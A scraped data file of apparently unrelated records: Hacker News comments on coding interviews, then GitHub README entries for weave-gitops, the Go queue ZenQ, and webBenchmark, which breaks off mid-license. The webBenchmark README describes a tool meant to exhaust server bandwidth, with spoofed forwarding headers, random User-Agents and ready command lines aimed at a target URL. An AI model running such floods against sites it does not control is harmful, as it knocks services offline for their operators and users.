wouldn't really want to be working there anyway.Reading through your post, I am noticing some trivial English mistakes that are common to non-native speakers.It's worth knowing that while you have successfully articulated everything, some people will still see your mistakes as red flags for future communication. Some might even assume that you will be making trivial code mistakes, too; despite there being no evidence of that.That kind of prejudice is common, and difficult to confront.There is no real need for you to improve your English skills: your writing isn't ambiguous or missing anything. Even so, it's worth recognizing the social dynamic that is likely to happen, and how that affects you.> I know how to KISS (Keep it stupid and simple)KISS is \u201ckeep it simple, stupid\u201d: https://en.wikipedia.org/wiki/KISS_principleYou are a good programmer. Period.I can tell you I\u2019ve received feedback on take home coding tests of \u201cOutstanding\u201d and \u201cUnreadable\u201d on the same day. Some people are never going to like your code.With that said, coding interviews are a skill and like any skill it can be learnt. Keep going, read Cracking The Coding Interview, practice leetcode and make notes of every question you feel you answered badly and make sure the next person who asks it gets a better answer. I understands Object Oriented correctly and knows\n where to use it and how and when to avoid it\n\nLiterally nobody \"knows\" this for every case, there's not a right answer: OO is a philosophy not an instruction manual. \"Good programmers\" accept there's ambiguity.Your experience is very commonTake home projects are much better for me than interview problems, but take home projects are unnecessarily complex and time consuming. But at least I can open source them and put them and make it look like I do side projectsFor a recent interview I was asked to build an IOC dependency injection library in 2h and the task was made \u201cdeliberately\u201d unclear according to the interviewer. So I spent 2 days researching IOC libraries, building some nice examples of how it should work to get a feel for the API, writing tests up front, writing the library and adding docs. Then I got an interview! Fantastic I thought, I passed the technical with my 100% tested IOC container that had a nice interface for injecting dependencies and even options for injecting singletons or new class instances with configurations passed into the constructor.Now I went through with them some extra things in the interview and fixed some things about the code and handled some things a bit better. After this investment of time I was told I didn\u2019t handle errors well enough in this 100% coverage tested example code of a library. This in my opinion was not true or even discussed in the interview, error handling was certainly not specifically mentioned in the assignment.Anyway to address your point, I don\u2019t think you should necessarily believe what other people say about you in job interviews; there are various types of interviewer but mostly the feedback is post rationalisation of \u201cthat\u2019s not how I would have done it\u201d even if your solution solves the problem perfectly. For this reason I\u2019ve decided unless I can\u2019t afford to feed myself I will avoid doing at home coding exercises that are deliberately vague in the future.If you want to get better at in person/under pressure coding exercises I highly recommend taking on Advent of Code [1] one year, these are the opposite of the vague problem specified above as there is an exact and clear right answer to collect each star.[1] https://adventofcode.com/It's worth mentioning that the world could use a few more grug-brain developers:\nhttps://grugbrain.dev/I think you\u2019ve grouped many things into a good/bad spectrum, but in reality we\u2019re talking about different qualities of a programmer.* Productivity\n* Simplifying Complexity\n* Design\n* Knowledge\n* Documentation\n* \u2026Are all different things and it\u2019s possible to be skilled at one and not another. Someone can be great at design but slow at getting the simplest things done, another may know a computer inside and out, but write zero documentation.I applied for a job.I did a coding assignment.I was asked to read two xml files, one with data, one with operations, and perform the operations on the data.The task was deliberately unclear and suggested to not use third party software.So I did the thing and wrote an xml parser.I documented my decisions in design etc.Later I found out that one could have used any third party XML reader package.I was declined for other reasons but when asking for feedback on my code, all I got was: You did not check for divisions by zero.I am still wondering what skill they actually wanted to test with the coding assignment.I'm a quite bad bad programmer.> My code is highly readable with good comments and other can take over my code responsibility quite easilySay no more, you're hired.Sheesh, the software interview process is so messed up that it makes people wonder if they can actually do the job they already do.\"Huh, maybe I don't know how to program. I thought I'd been programming functioning applications professsionally all this time, but despite all evidence to the contrary, maybe not!\"The problem is with the interview process, not you. More broadly, the problem is with the industry and its incentives, not you.If I had to put my finger on it, I'd say it's the need to scale everything, including human processes like finding new team members. Nobody doubts that spending a lot of time really getting to know a programmer's strengths and weaknesses would be better, but we'd have to sacrifice a lot of throughput in the hiring process, and god forbid we do that.World needs more 1x programmers.I used to be like you. I stay on top of cpp con talks, I read Meyers and Andrescu's books and I had some fun side projects and I do fine at work, regular promotions, etc, but I did incredibly badly during interviews. I wasn't sure if it's some kind of IQ thing because I know people who can answer those CS questions without studying but I took the advice of some friends and I spent months grinding leetcode style questions. After a while something in my brain clicked and since then I've gotten a ton of job offers and worked at two FAANGs.As I read your post I recall having come to much of the same conclusions (also have a similar non traditional/institutional history - over 20yrs writing/building stuff).I went as far as to enroll in an interview prep course to try and \u201cfreshen\u201d up for an attempt to move from my current role/comp to a faang.The trainer was an ex google guy who had done a ton of interviews over the years so I took the opportunity to ask him\u2026 why?Why is the knowledge of how to implement an esoteric algorithm that I would almost never have a need to use for the job/role relevant. Why is memorization of these implementations so critical? \nI get why it\u2019s useful to understand the high level ideas/approaches but why do we need to be able to recite their implementations like the gospel?After much prodding he admitted that it ultimately boils down to the companies using these practices trying to find an \u201cunbiased\u201d means of measuring a candidate. People tend to be terrible judges of character so having some standard questions and expected solutions gives the company at least some hope of providing a way to interview and hire at scale and reduce bias (slightly).I get it now, there are (were?) so many applicants and so many interviewers that they had no time (or confidence) to try and get to know the applicants and their specific skills or what values they could add. They basically decided to punt and choose people who take the time to learn the gospel - these folks would either end up being good developers/engineers or more commonly getting put on review and fired - but they showed they had the capable to learn whatever might be needed.I get it, I do, ultimately decided that I\u2019m too old for the politics of the process (and that\u2019s kinda by design) and I\u2019d be better served ghosting comps that require this sort of thing going forward.- just a grey bearded devThere's a difference between a PROGRAMMER and SOFTWARE ENGINEER. I know bad programmers that are good swes, and I know good programmers that are bad swes. Though the best is probably happy average.I think something that is often forgotten is that there are highly productive programmers who have near-zero industry experience, or at least are not totally privy to \"modern\" engineering practices, and who mostly just program as a hobby (or in open-source).That being said, the standards that define what a \"good\" programmer is are not well defined, and everyone has a different idea of what it means. It is also possible to be a \"terrible\" programmer and still manage to sell two startups.I don't know if you're a good or bad programmer, but I'll tell you this about job interviews:I've given dozens of interviews over the past 3 years. I'm fairly certain everyone got out of the interview with me feeling like they did very poorly, when in fact a lot of people were doing well. All of the people I ended up hiring told me \"I was sure I completely failed your interview\".You don't know what interviewers are looking for, so don't make assumptions. I'm almost never looking for a \"correct\" answer. I'm always looking for your behavior and attitude when answering those questions. My definition of a good programmer is someone who understands that it's a team sports, who values clear communication and who knows how to read the doc on their own. You may or may not have implemented your own lisp in your spare time, but this is secondary.If you ask me to review the quality of your code, I'll spend more time reading your commit messages and variable names, than you realize. It's as important as the choice of algorithm and data structure.Other interviewers value other things. There's no one thing.TLDR: You don't know how well you did in interviews, it's very likely you're better than you think.Not quite. Learn more about Monad and Category theory then i'm sure you're really a good programmer.I'm the same way. 25 years in the industry, though I consider myself a jack of all trades. Went from Oracle development -> ASP Classic -> C# -> PHP -> NodeJS. I think I'm pretty good at getting what needs to be done, but I absolutely fail when doing tests. I know how to program, I just may not know all the terminology and what... and if I don't understand something, google is always a few clicks away. Keeps me scared of looking for new opportunities though.You're probably a very good programmer - strange that you're comparing your work against seniors; are you not a senior engineer yet with 20 years experience? You probably could be.Also, don't be so down on yourself regarding interview questions. If you spent a month or two just practicing these types of questions in your free time you'd be surprised how you'd do on some of the interviews you would normally bomb out.It's difficult for any of us to really tell how much truth is in every statement. For example readability - its difficult to asses it without looking at your code.It's nothing personal, but many developers tend to think about their skills higher than they are in reality.What i can suggest you, is to ask for feedback after interviews. You will get more specifics thereEDIT:\nI forgot to actually add a verb in the first sentence and some punctationI\u2019ve never got the job where they asked me to code some algorithm on the spotYour list makes the case for being \"good\", but that doesn't matter.The \"job interview questions\" are largely popularized by people who do not understand hiring, and probably don't understand much of anything else, with a cargo cult mindless copy/paste of practices that don't actually apply to them.There is a niche of a niche of a niche of roles where deep specialized knowledge is actually a baseline requirement in order to be successful in the role. 99% of the other roles filled by human beings who write software don't require anything close to it, but the companies delight in wasting everyone's time anyway.Most of the very best programmers I've ever known bomb these idiotic interviews and the companies (and their customers) lose because of it.A fine place for me to stop babbling.Wrote a comic about code interviews [0].Code interviews are broken. I judge a company's software development maturity based on their interview process. I've been the owner of such processes, and I've made the mistake of applying non-related coding exercises, but I've also had success revisiting these with new approaches.There's no formula for all companies, but the best kind of interview process, in my opinion, is to match the developer skills and personality with what you already have in-house, and with the kind of problems your tech team is facing.[0]: https://badecaf.com/5/Job interviews have a very questionable form of gatekeeping. But it is a very well documented form of gatekeeping. If you want to get good grades at job inteviews, you can practice how to pass that test... \nI do agree it doesn't reflect the quality of developer you are, but it is what it is...Requires Go 1.6 or greater. Interestingly, the \"open source\" code seems to not be viewable!Edit: you can see it here: https://github.com/golang/mobileAny example how to call android APIs like intents?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "weaveworks/weave-gitops", "link": "https://github.com/weaveworks/weave-gitops", "tags": ["gitops"], "stars": 557, "description": "Weave GitOps OSS", "lang": "Go", "repo_lang": "", "readme": "# Weave GitOps\n\n![Test status](https://github.com/weaveworks/weave-gitops/actions/workflows/pr.yaml/badge.svg)\n[![LICENSE](https://img.shields.io/github/license/weaveworks/weave-gitops)](https://github.com/weaveworks/weave-gitops/blob/master/LICENSE)\n[![Contributors](https://img.shields.io/github/contributors/weaveworks/weave-gitops)](https://github.com/weaveworks/weave-gitops/graphs/contributors)\n[![Release](https://img.shields.io/github/v/release/weaveworks/weave-gitops?include_prereleases)](https://github.com/weaveworks/weave-gitops/releases/latest)\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B19155%2Fgithub.com%2Fweaveworks%2Fweave-gitops.svg?type=shield)](https://app.fossa.com/reports/005da7c4-1f10-4889-9432-8b97c2084e41)\n\nWeave GitOps is a simple open source developer platform for people who want cloud native applications, without needing\nKubernetes expertise. Experience how easy it is to enable GitOps and run your apps in a cluster. Use git to collaborate\nwith team members making new deployments easy and secure. Start with what developers need to run apps, and then easily\nextend to define and run your own enterprise platform.\n\nFrom Kubernetes run Weave GitOps to get:\n\n1. Application Operations: manage and automate deployment pipelines for apps and more\n2. Platforms: the easy way to have your own custom PaaS on cloud or on premise\n3. Extensions: coordinate Kubernetes rollouts with eg. VMs, DBs and cloud services\n\nOur vision is that all cloud native applications should be easy for developers, including operations which should be\nautomated and secure. Weave GitOps is a highly extensible tool to achieve this by placing Kubernetes and GitOps at the\ncore and building a platform around that.\n\nWe use GitOps tools throughout. Today Weave GitOps defaults are Flux, Kustomize, Helm, Sops and Kubernetes CAPI. If you\nuse Flux already then you can easily add Weave GitOps to create a platform management overlay.\n\n### Manage and view applications all in one place.\n\n![Application Page](./doc/img/01-workloads.png)\n\n### Easily see your continuous deployments and what is being produced via GitOps. There are multiple views for debugging as well as being able to sync your latest git commits directly from the UI.\n\n![Reconciliation Page](./doc/img/02-workload-detail.png)\n\n### Leverage Kubernetes RBAC to control permissions in the dashboard.\n\n![Source Page](./doc/img/03-rbac.jpg)\n\n### See your entire source landscape whether it is a git repository, helm repository, or bucket.\n\n![Flux Runtime](./doc/img/04-sources.jpg)\n\n### Quickly see the health of your reconciliation deployment runtime. These are the workers that are ensuring your software is running on the Kubernetes cluster.\n\n![Flux Runtime](./doc/img/05-runtime.jpg)\n\n## Getting Started\n\n### CLI Installation\n\nMac / Linux\n\n```console\ncurl --silent --location \"https://github.com/weaveworks/weave-gitops/releases/download/v0.17.0/gitops-$(uname)-$(uname -m).tar.gz\" | tar xz -C /tmp\nsudo mv /tmp/gitops /usr/local/bin\ngitops version\n```\n\nAlternatively, users can use Homebrew:\n\n```console\nbrew tap weaveworks/tap\nbrew install weaveworks/tap/gitops\n```\n\nPlease see the [getting started guide](https://docs.gitops.weave.works/docs/getting-started).\n\n## CLI Reference\n\n```console\nCommand line utility for managing Kubernetes applications via GitOps.\n\nUsage:\n gitops [command]\n\nExamples:\n\n # Get help for gitops add cluster command\n gitops add cluster -h\n gitops help add cluster\n\n # Get the version of gitops along with commit, branch, and flux version\n gitops version\n\n To learn more, you can find our documentation at https://docs.gitops.weave.works/\n\n\nAvailable Commands:\n beta This component contains unstable or still-in-development functionality\n check Validates flux compatibility\n completion Generate the autocompletion script for the specified shell\n create Creates a resource\n get Display one or many Weave GitOps resources\n help Help about any command\n version Display gitops version\n\nFlags:\n -e, --endpoint WEAVE_GITOPS_ENTERPRISE_API_URL The Weave GitOps Enterprise HTTP API endpoint can be set with WEAVE_GITOPS_ENTERPRISE_API_URL environment variable\n -h, --help help for gitops\n --insecure-skip-tls-verify If true, the server's certificate will not be checked for validity. This will make your HTTPS connections insecure\n --kubeconfig string Paths to a kubeconfig. Only required if out-of-cluster.\n --namespace string The namespace scope for this operation (default \"flux-system\")\n -p, --password WEAVE_GITOPS_PASSWORD The Weave GitOps Enterprise password for authentication can be set with WEAVE_GITOPS_PASSWORD environment variable\n -u, --username WEAVE_GITOPS_USERNAME The Weave GitOps Enterprise username for authentication can be set with WEAVE_GITOPS_USERNAME environment variable\n\nUse \"gitops [command] --help\" for more information about a command.\n```\n\nFor more information please see the [docs](https://docs.gitops.weave.works/docs/references/cli-reference/gitops/)\n\n## FAQ\n\nPlease see our Weave GitOps OSS [FAQ](https://www.weave.works/faqs-for-weave-gitops)\n\n## Contribution\n\nNeed help or want to contribute? Please see the links below.\n\n- Getting Started?\n - Follow our [Get Started guide](https://docs.gitops.weave.works/docs/getting-started) and give us feedback\n- Need help?\n - Talk to us in\n the [#weave-gitops channel](https://app.slack.com/client/T2NDH1D9D/C0248LVC719/thread/C2ND76PAA-1621532937.019800)\n on Weaveworks Community Slack. [Invite yourself if you haven't joined yet.](https://slack.weave.works/)\n- Have feature proposals or want to contribute?\n - Please create a [Github issue](https://github.com/weaveworks/weave-gitops/issues)\n - Learn more about contributing [here](./CONTRIBUTING.md).\n\n## License scan details\n\n[![FOSSA Status](https://app.fossa.com/api/projects/custom%2B19155%2Fgithub.com%2Fweaveworks%2Fweave-gitops.svg?type=large)](https://app.fossa.com/reports/005da7c4-1f10-4889-9432-8b97c2084e41)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "alphadose/ZenQ", "link": "https://github.com/alphadose/ZenQ", "tags": ["go", "golang", "lock-free", "low-latency", "memory-efficient", "ringbuffer", "thread-safe", "zero-allocations", "highly-concurrent", "mpsc-queue", "spsc-queue", "zenq", "concurrency", "fastest", "optimization", "high-throughput"], "stars": 557, "description": "A thread-safe queue faster and more resource efficient than golang's native channels", "lang": "Go", "repo_lang": "", "readme": "# ZenQ\n\n> A low-latency thread-safe queue in golang implemented using a lock-free ringbuffer and runtime internals\n\nBased on the [LMAX Disruptor Pattern](https://lmax-exchange.github.io/disruptor/disruptor.html)\n\n## Features\n\n* Much faster than native channels in both SPSC (single-producer-single-consumer) and MPSC (multi-producer-single-consumer) modes in terms of `time/op`\n* More resource efficient in terms of `memory_allocation/op` and `num_allocations/op` evident while benchmarking large batch size inputs\n* Handles the case where NUM_WRITER_GOROUTINES > NUM_CPU_CORES much better than native channels\n* Selection from multiple ZenQs just like golang's `select{}` ensuring fair selection and no starvation\n* Closing a ZenQ\n\nBenchmarks to support the above claims [here](#benchmarks)\n\n## Installation\n\nYou need Golang [1.19.x](https://go.dev/dl/) or above\n\n```bash\n$ go get github.com/alphadose/zenq/v2\n```\n\n## Usage\n\n1. Simple Read/Write\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\n\t\"github.com/alphadose/zenq/v2\"\n)\n\ntype payload struct {\n\talpha int\n\tbeta string\n}\n\nfunc main() {\n\tzq := zenq.New[payload](10)\n\n\tfor j := 0; j < 5; j++ {\n\t\tgo func() {\n\t\t\tfor i := 0; i < 20; i++ {\n\t\t\t\tzq.Write(payload{\n\t\t\t\t\talpha: i,\n\t\t\t\t\tbeta: fmt.Sprint(i),\n\t\t\t\t})\n\t\t\t}\n\t\t}()\n\t}\n\n\tfor i := 0; i < 100; i++ {\n\t\tif data, queueOpen := zq.Read(); queueOpen {\n\t\t\tfmt.Printf(\"%+v\\n\", data)\n\t\t}\n\t}\n}\n```\n\n2. **Selection** from multiple ZenQs just like golang's native `select{}`. The selection process is fair i.e no single ZenQ gets starved\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\n\t\"github.com/alphadose/zenq/v2\"\n)\n\ntype custom1 struct {\n\talpha int\n\tbeta string\n}\n\ntype custom2 struct {\n\tgamma int\n}\n\nconst size = 100\n\nvar (\n\tzq1 = zenq.New[int](size)\n\tzq2 = zenq.New[string](size)\n\tzq3 = zenq.New[custom1](size)\n\tzq4 = zenq.New[*custom2](size)\n)\n\nfunc main() {\n\tgo looper(intProducer)\n\tgo looper(stringProducer)\n\tgo looper(custom1Producer)\n\tgo looper(custom2Producer)\n\n\tfor i := 0; i < 40; i++ {\n\n\t\t// Selection occurs here\n\t\tif data := zenq.Select(zq1, zq2, zq3, zq4); data != nil {\n\t\t\tswitch data.(type) {\n\t\t\tcase int:\n\t\t\t\tfmt.Printf(\"Received int %d\\n\", data)\n\t\t\tcase string:\n\t\t\t\tfmt.Printf(\"Received string %s\\n\", data)\n\t\t\tcase custom1:\n\t\t\t\tfmt.Printf(\"Received custom data type number 1 %#v\\n\", data)\n\t\t\tcase *custom2:\n\t\t\t\tfmt.Printf(\"Received pointer %#v\\n\", data)\n\t\t\t}\n\t\t}\n\t}\n}\n\nfunc intProducer(ctr int) { zq1.Write(ctr) }\n\nfunc stringProducer(ctr int) { zq2.Write(fmt.Sprint(ctr * 10)) }\n\nfunc custom1Producer(ctr int) { zq3.Write(custom1{alpha: ctr, beta: fmt.Sprint(ctr)}) }\n\nfunc custom2Producer(ctr int) { zq4.Write(&custom2{gamma: 1 << ctr}) }\n\nfunc looper(producer func(ctr int)) {\n\tfor i := 0; i < 10; i++ {\n\t\tproducer(i)\n\t}\n}\n```\n\n## Benchmarks\n\nBenchmarking code available [here](./benchmarks)\n\nNote that if you run the benchmarks with `--race` flag then ZenQ will perform slower because the `--race` flag slows\ndown the atomic operations in golang. Under normal circumstances, ZenQ will outperform golang native channels.\n\n### Hardware Specs\n\n```\n\u276f neofetch\n 'c. alphadose@ReiEki.local\n ,xNMM. ----------------------\n .OMMMMo OS: macOS 12.3 21E230 arm64\n OMMM0, Host: MacBookAir10,1\n .;loddo:' loolloddol;. Kernel: 21.4.0\n cKMMMMMMMMMMNWMMMMMMMMMM0: Uptime: 6 hours, 41 mins\n .KMMMMMMMMMMMMMMMMMMMMMMMWd. Packages: 86 (brew)\n XMMMMMMMMMMMMMMMMMMMMMMMX. Shell: zsh 5.8\n;MMMMMMMMMMMMMMMMMMMMMMMM: Resolution: 1440x900\n:MMMMMMMMMMMMMMMMMMMMMMMM: DE: Aqua\n.MMMMMMMMMMMMMMMMMMMMMMMMX. WM: Rectangle\n kMMMMMMMMMMMMMMMMMMMMMMMMWd. Terminal: iTerm2\n .XMMMMMMMMMMMMMMMMMMMMMMMMMMk Terminal Font: FiraCodeNerdFontComplete-Medium 16 (normal)\n .XMMMMMMMMMMMMMMMMMMMMMMMMK. CPU: Apple M1\n kMMMMMMMMMMMMMMMMMMMMMMd GPU: Apple M1\n ;KMMMMMMMWXXWMMMMMMMk. Memory: 1370MiB / 8192MiB\n .cooc,. .,coo:.\n\n```\n\n### Terminology\n\n* NUM_WRITERS -> The number of goroutines concurrently writing to ZenQ/Channel\n* INPUT_SIZE -> The number of input payloads to be passed through ZenQ/Channel from producers to consumer\n\n```bash\nComputed from benchstat of 30 benchmarks each via go test -benchmem -bench=. benchmarks/simple/*.go\n\nname time/op\n_Chan_NumWriters1_InputSize600-8 23.2\u00b5s \u00b1 1%\n_ZenQ_NumWriters1_InputSize600-8 17.9\u00b5s \u00b1 1%\n_Chan_NumWriters3_InputSize60000-8 5.27ms \u00b1 3%\n_ZenQ_NumWriters3_InputSize60000-8 2.36ms \u00b1 2%\n_Chan_NumWriters8_InputSize6000000-8 671ms \u00b1 2%\n_ZenQ_NumWriters8_InputSize6000000-8 234ms \u00b1 6%\n_Chan_NumWriters100_InputSize6000000-8 1.59s \u00b1 4%\n_ZenQ_NumWriters100_InputSize6000000-8 309ms \u00b1 2%\n_Chan_NumWriters1000_InputSize7000000-8 1.97s \u00b1 0%\n_ZenQ_NumWriters1000_InputSize7000000-8 389ms \u00b1 4%\n_Chan_Million_Blocking_Writers-8 10.4s \u00b1 2%\n_ZenQ_Million_Blocking_Writers-8 2.32s \u00b121%\n\nname alloc/op\n_Chan_NumWriters1_InputSize600-8 0.00B\n_ZenQ_NumWriters1_InputSize600-8 0.00B\n_Chan_NumWriters3_InputSize60000-8 109B \u00b168%\n_ZenQ_NumWriters3_InputSize60000-8 24.6B \u00b1107%\n_Chan_NumWriters8_InputSize6000000-8 802B \u00b1241%\n_ZenQ_NumWriters8_InputSize6000000-8 1.18kB \u00b1100%\n_Chan_NumWriters100_InputSize6000000-8 44.2kB \u00b141%\n_ZenQ_NumWriters100_InputSize6000000-8 10.7kB \u00b138%\n_Chan_NumWriters1000_InputSize7000000-8 476kB \u00b1 8%\n_ZenQ_NumWriters1000_InputSize7000000-8 90.6kB \u00b110%\n_Chan_Million_Blocking_Writers-8 553MB \u00b1 0%\n_ZenQ_Million_Blocking_Writers-8 122MB \u00b1 3%\n\nname allocs/op\n_Chan_NumWriters1_InputSize600-8 0.00\n_ZenQ_NumWriters1_InputSize600-8 0.00\n_Chan_NumWriters3_InputSize60000-8 0.00\n_ZenQ_NumWriters3_InputSize60000-8 0.00\n_Chan_NumWriters8_InputSize6000000-8 2.76 \u00b1190%\n_ZenQ_NumWriters8_InputSize6000000-8 5.47 \u00b183%\n_Chan_NumWriters100_InputSize6000000-8 159 \u00b126%\n_ZenQ_NumWriters100_InputSize6000000-8 25.1 \u00b139%\n_Chan_NumWriters1000_InputSize7000000-8 1.76k \u00b1 6%\n_ZenQ_NumWriters1000_InputSize7000000-8 47.3 \u00b131%\n_Chan_Million_Blocking_Writers-8 2.00M \u00b1 0%\n_ZenQ_Million_Blocking_Writers-8 1.00M \u00b1 0%\n```\n\nThe above results show that ZenQ is more efficient than channels in all 3 metrics i.e `time/op`, `mem_alloc/op` and `num_allocs/op` for the following tested cases:-\n\n1. SPSC\n2. MPSC with NUM_WRITER_GOROUTINES < NUM_CPU_CORES\n3. MPSC with NUM_WRITER_GOROUTINES > NUM_CPU_CORES\n\n\n## Cherry on the Cake\n\nIn SPSC mode ZenQ is faster than channels by **92 seconds** in case of input size of 6 * 108 elements\n\n```bash\n\u276f go run benchmarks/simple/main.go\n\nWith Input Batch Size: 60 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 26.916\u00b5s\nZenQ Runner completed transfer in: 20.292\u00b5s\n====================================================================\n\nWith Input Batch Size: 600 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 135.75\u00b5s\nZenQ Runner completed transfer in: 105.792\u00b5s\n====================================================================\n\nWith Input Batch Size: 6000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 2.100209ms\nZenQ Runner completed transfer in: 510.792\u00b5s\n====================================================================\n\nWith Input Batch Size: 6000000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 1.241481917s\nZenQ Runner completed transfer in: 226.068209ms\n====================================================================\n\nWith Input Batch Size: 600000000 and Num Concurrent Writers: 1\n\nNative Channel Runner completed transfer in: 1m55.074638875s\nZenQ Runner completed transfer in: 22.582667917s\n====================================================================\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "maintell/webBenchmark", "link": "https://github.com/maintell/webBenchmark", "tags": [], "stars": 557, "description": "a simple tool of website benchmark.", "lang": "Go", "repo_lang": "", "readme": "# webBenchmark\nhttp benchmark tool to ran out your server bandwidth.\n\n\u7528\u6237\u5728\u4f7f\u7528\u672c\u5de5\u5177\u524d\u8bf7\u5148\u67e5\u770b\u6388\u6743\u53ca\u514d\u8d23\u58f0\u660e\uff0cwebBenchmark\u4ec5\u4ec5\u662f\u4e00\u4e2a\u7528\u4e8e\u6d4b\u8bd5\u7f51\u9875\u670d\u52a1\u5668\u6027\u80fd\u7684\u5de5\u5177\uff0c\u7528\u4f5c\u5176\u4ed6\u7528\u9014\uff0c\u540e\u679c\u81ea\u8d1f\u3002\n\n- random User-Agent on every Request\n- customizable Referer Url,\n- customizable header,\n- concurrent routines as you wish, depends on you server performance.\n- http post mode\n- specify multi target ip, or resolved by system dns.\n- randomly X-Forwarded-For and X-Real-IP (default on).\n\n# Todo \n- automatically tune concurrent routines to gain maximum performance. \n- support NOT standard port in address with specify target ip.\n- subscription benchmark task from remote server.\n\n# Usage\n webBenchmark -c [COUNT] -s [URL] -r [REFERER]\n -c int\n concurrent routines for download (default 16)\n -r string\n referer url\n -s string\n target url (default \"https://baidu.com\")\n -i string\n custom ip address for that domain, multiple addresses automatically will be assigned randomly\n -H http header pattern\n http header pattern, use Random with number prefix will generate random string, same key will be overwritten\n -f string\n randomized X-Forwarded-For and X-Real-IP address\n -p string\n post content\n\n# Linux\n wget https://github.com/maintell/webBenchmark/releases/download/0.5/webBenchmark_linux_x64\n chmod +x webBenchmark_linux_x64\n ./webBenchmark_linux_x64 -c 32 -s https://target.url\n\n## Advanced example\n # send request to 10.0.0.1 and 10.0.0.2 for https://target.url with 32 concurrent threads \n # and refer is https://refer.url \n ./webBenchmark_linux_x64 -c 32 -s https://target.url -r https://refer.url -i 10.0.0.1 -i 10.0.0.2\n # send request to https://target.url with header regid:123 and sign:Random10\n ./webBenchmark_linux_x64 -s https://target.url -H 'regid:123' -H 'sign:QpXDYHdVzB'\n \n\n\n\n## LICENSE AND DISCLAIMER\n\n\n**1. Application.**\n\nPlease read this document carefully before using, accessing, downloading, installing or otherwise operating the webBenchmark as defined hereafter.\n\nUsing, accessing, downloading or otherwise operating any of the webBenchmark, constitutes an unconditional agreement by You to be bound by this the following terms and conditions for the time of Using the webBenchmark and thereafter.\n\nIF YOU DO NOT ACCEPT THE TERMS OF THIS LICENSE AGREEMENT, YOU ARE PROHIBITED FROM USING ANY OF THE webBenchmark.\n\n**2. Definitions.**\n\n**\"webBenchmark\"** shall mean any of the documents, description, explanations, presentations, media types, all schedules, appendixes and related documentation, software in object or source code, including Updates provided on this Platform by Licensor for Your Use.\n\n**\"Derivative Works\"** means any modification, change, adaptations, contributions, enhancements, customization, modifications, inventions, developments, improvements of the Date Product by you and not developed by Licensor or integrated into the Date Product by Licensor.\n\n**\"Intellectual Property Rights\"** means any intellectual property and proprietary rights, including , but not limited to, copyrights, moral rights, works of authorship, trade and service marks, trade names, rights in logos and get-up, inventions and discoveries, and Know-How, registered designs, design rights, patents, utility models, all rights of whatsoever nature in computer software and data, source code, database rights all intangible rights and privileges of nature similar or allied to any of the foregoing, in every case in any part of the world and whether or not registered; and including all granted registrations and all applications for registration, all renewals, reversions or extensions, the right to sue for damages for past infringement and all forms of protection of a similar nature which may subsist anywhere in the world.\n\n**\"Know-How\"** means any information relating to commercial, scientific and technical matters, inventions and trade secrets, including but not limited to any patentable technical or other information which is not in the public domain including information comprising or relating to concepts, discoveries, data, designs, formulae, ideas, reports and data analyses.\n\n**\"License\"** shall mean this license and disclaimer document and its terms and conditions for use, reproduction, and distribution as provided in this document.\n\n**\"Licensor\"** shall mean the copyright owner or entity authorized by the copyright owner that is granting the License, meaning maintell, and its successors and assigns.\n\n**\"Parties\"** means both You and Licensor.\n\n**\"Party\"** means You or Licensor individually.\n\n**\"Platform\"** means the maintell GitHub account and related repositories available at https://github.com/maintell.\n\n**\"Purpose\"** means using or integrating the webBenchmark free of charge for the purpose of using and integrating benchmarking on a website, whereby examples are provided in the webBenchmark to demonstrate specific features.\n\n**\"SDK\"** means a software development kit which is a set of software development tools that allows the creation of applications for a certain software package, video service platforms, software framework, or similar development platform.\n\n**\"maintell\"** means a set of tools written and developed by the Licensor that provides support for benchmark and related functionalities for HTTP including any related software, source and object code, deliverables, technology and related resources and relevant documentation provided and/or created, made available, license and/or sold to you and developed by Licensor in connection with separate license terms and conditions.\n\n**\"Use\"** means using, accessing, downloading, installing or otherwise operating or using the webBenchmark as part of Your self-service and subject to clause titled \"LICENSE\" and in connection with the Purpose of this License and its terms and conditions.\n\n**\"Updates\"** means all updates, modifications and releases of new versions of webBenchmark containing improvements, corrections, minor modifications, bug fixes, patches, or the like that have been added to the Platform by the Licensor.\n\n\"**You\" (or \"Your\")** shall mean an individual or legal entity exercising permissions granted by this License.\n\n**3. License**\n\nSubject to the terms and conditions of this License, Licensor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, right to reproduce, prepare Derivative Works of, sublicence, make, have made, use, import the webBenchmark and the Derivative Works as required for the Purpose and subject to the terms and conditions as described in the Date Products.\n\nExcept as otherwise agreed by Licensor in writing in separate license terms and conditions for the use of maintell, You shall not distribute, relicense, sell, lease, transfer, encumber, assign or make available for public use the webBenchmark. Any attempt to take any such actions is void and will automatically terminate Your rights under this License.\n\nIf the webBenchmark or your Use (allegedly) constitutes a direct or contributory infringement, then any\n\nrights granted to You under this License for that webBenchmark shall terminate immediately.\n\nUnless agreed by Parties in writing or if the enforcement of this provision is prohibited by applicable law, You shall not under any circumstances attempt, or knowingly cause or permit others to attempt to modify, adapt, port, merge, decompile, disassemble, reverse engineer, decipher, decrypt or otherwise discover the source code or any other parts of the mechanisms and algorithms used by webBenchmark nor remove restrictions or create derivative works of webBenchmark or of any part of webBenchmark.\n\n**4. Support**\n\nThe Licensor has no obligation under this License to provide any maintenance, support or training to You.\n\n**5. Update**\n\nThe Licensor may at any time, at its discretion provide Updates to the webBenchmark. The Licensor has, however, no obligation whatsoever under this License to provide Updates, modify or release new versions of the webBenchmark.\n\n**6. Submission of Contributions**\n\nAny contribution submitted for inclusion in the webBenchmark by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Such inclusion shall be subject to Licensor's discretion. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such contributions.\n\n**7. Trademarks.**\n\nThis License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the webBenchmark and related copyright notices.\n\n**8. 